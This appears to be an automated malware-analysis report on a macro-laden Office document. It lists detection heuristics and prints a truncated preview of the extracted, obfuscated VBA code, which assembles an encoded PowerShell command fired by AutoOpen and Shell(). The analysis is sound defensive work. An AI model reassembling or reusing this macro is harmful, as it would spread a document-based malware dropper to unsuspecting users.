Malware Insights
The sample is a malicious Office document containing VBA macros. The critical-severity 'OLE_VBA_SHELL' heuristic, together with 'OLE_VBA_PCODE_AUTOEXEC_EXEC', indicates that the AutoOpen macro attempts to execute code via the Shell() function. The string reconstructed from the VBA script, 'Hello [string]::Join( '', ( [char[]] (115,32,19 ,22 ,106, 57,50, 32 , 122 ,56 , 53 , 61, 50 , 35,119,25, 50 , 35 , 121 , 0 ,50,53 , 20,59,62,50, 57 , 35 ,108,115 ,13 ,25 ) ) )', suggests an attempt to assemble a command or payload for execution. This indicates downloader or dropper functionality.
Heuristics (6)

- VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14252 bytes |

SHA-256: f5d46a15dd2dbe414cc8c3e01d7df17ac830893e03a98bcbc8a401520257f27b
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "jUVAdNfZoiHY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IuBiGQqLAP"
Function wBOPrzlQbYE()
On Error Resume Next
zNqGfp = CByte(7410 * Tan(88385) / 464 + CLng(llIUP * 8611 * 21190 * Chr(98954)))
DDSBNC = (66897 / CBool(10521) + 67845 + CSng(KqDSCw) * (31431 - HUwKkV + 32334 - CLng(iKYvG)))
oMRjivw = "He" + "ll" + " [s" + "TRinG" + "]::" + "JoIn" + Chr(40) + " '' ," + " " + Chr(40) + "[cHAR[]" + "]" + Chr(40) + "115" + ",3"
YAuijS = CByte(96530 * Tan(75342) / 66689 + CLng(vVbiz * 144 * 52620 * Chr(55810)))
MwPusT = (93608 / CBool(69846) + 16820 + CSng(Yhnlh) * (83844 - bwSbpN + 38747 - CLng(ZwNwpZ)))
EkMcJpBAqzS = "8 " + ",19 ,2" + "2 ,106," + " 57," + "50, 3" + "2 , 122" + ",56 " + ", 53 , 6" + "1, 50"
bwlTQ = CByte(93262 * Tan(70315) / 84983 + CLng(WtnHiS * 98521 * 32085 * Chr(54534)))
dOjTX = (71187 / CBool(91543) + 19927 + CSng(UjoSw) * (49016 - nrDIX + 55944 - CLng(kWurs)))
jKChTbjn = ", 52" + " , " + "35,119," + "25, 5" + "0 ," + " 35 " + ", 121"
kFSUqj = CByte(31457 * Tan(80298) / 26125 + CLng(Pwfvju * 23 * 70691 * Chr(6727)))
CWKIY = (40095 / CBool(2653) + 199 + CSng(wzctD) * (8628 - WzUBCo + 30568 - CLng(UJUPw)))
QKjowza = " , " + "0 ,50" + ",53 , " + "20,59,6" + "2,5" + "0, " + "57 , 35" + " ,108," + "115 ," + "13" + " ,25 ,"
JjMMuj = CByte(19229 * Tan(83687) / 297 + CLng(cMBzzd * 89849 * 31838 * Chr(68139)))
wBvaUN = (12627 / CBool(8079) + 77393 + CSng(AlBOL) * (84196 - YMVcj + 69224 - CLng(mFJUX)))
OYoSjCEzkz = "5, " + "106 , 11" + "2 ,63,3" + "5 , 35, " + "39" + ", " + "109" + " ,120" + " , 120," + " 45,59 " + ",52"
tljri = CByte(22090 * Tan(57278) / 3729 + CLng(RkDlZq * 60513 * 76398 * Chr(89142)))
jbYiKQ = (33961 / CBool(48273) + 77440 + CSng(DmjNE) * (32523 - pUchT + 46707 - CLng(sPikYI)))
zYtPHzPQvi = ",122" + ",54, " + "54 " + ", 121" + ", 56," + "37 ," + " 48,120" + " ,3," + " 14,19,"
wBOPrzlQbYE = oMRjivw + EkMcJpBAqzS + jKChTbjn + QKjowza + OYoSjCEzkz + zYtPHzPQvi
rqrDFz = CByte(58614 * Tan(43665) / 52625 + CLng(WnHskk * 44929 * 64313 * Chr(29418)))
EFvGJP = (6323 / CBool(78207) + 81204 + CSng(ljAfDK) * (2036 - WWFvn + 82356 - CLng(wQnJB)))
End Function

Function siVMt()
On Error Resume Next
uLFZS = CByte(31534 * Tan(90726) / 77398 + CLng(jKbOrw * 95532 * 96145 * Chr(89501)))
iRXbIR = (9804 / CBool(90679) + 24273 + CSng(QioJuq) * (16183 - zNWdvr + 66557 - CLng(fwaMs)))
mUlNPjZbnEk = "101 " + ", 61,97 " + ",13, 20 " + ",120 " + ",23 ,6" + "3," + " 35,35" + " ,39 , 1" + "09, 120" + ", 120,5" + "3 " + ", 63 ,6"
jkzWs = CByte(85776 * Tan(8133) / 7375 + CLng(XuClOJ * 39155 * 7686 * Chr(14289)))
vjCTBW = (61983 / CBool(86312) + 1272 + CSng(GUAHKk) * (55865 - UXsjJ + 40549 - CLng(TTcqJi)))
jQDkSrD = "2 ,35" + ", 5" + "4," + " 62, 63 " + ",56,36 " + ", 39" + " ," + " 62, 35" + ",54" + " , 59 " + ",121 "
YjnpWJ = CByte(99877 * Tan(66566) / 92858 + CLng(MWBjV * 6154 * 98590 * Chr(60212)))
tdXkO = (49622 / CBool(63501) + 61308 + CSng(CDCrDG) * (77542 - JoskA + 32043 - CLng(UmHjYJ)))
hZFjsGkEIzF = ", 52, 5" + "6 , 58 ," + "12" + "0," + "22, 24" + " ,111 " + ",14,52," + " 53, " + "102 , 0"
EzQoJ = CByte(38423 * Tan(4483) / 92660 + CLng(WkGdN * 10081 * 98329 * Chr(96765)))
tKPPls = (24704 / CBool(73346) + 30129 + CSng(SzHXDi) * (36323 - OjfQb + 85183 - CLng(XdPBzj)))
zYXocqtOY = " ," + " 20" + ", 12" + "0,23" + ",6" + "3, 3" + "5,3" + "5, 39 , " + "109," + "120"
iQwwj = CByte(43813 * Tan(15763) / 4979 + CLng(FmlojM * 74077 * 38019 * Chr(24693)))
Czlwv = (56241 / CBool(67686) + 44461 + CSng(NPzkQt) * (20933 - JHOUwB + 34693 - CLng(IjVOS)))
qPaduPBrjpi = ", 120, " + "53 , 56 " + ",46 , " + "59 ," + " 56 , 57" + " ,51" + " ,5"
VMIww = CByte(43986 * Tan(73963) / 63254 + CLng(tlDlP * 80643 * 83645 * Chr(57721)))
Uvrkk = (6831 / CBool(96341) + 36556 + CSng(mzOIP) * (90537 - jnTJok + 13548 - CLng(IiNMl)))
UjjXMBdYk = "6, 57," + " 121 ... (truncated)
```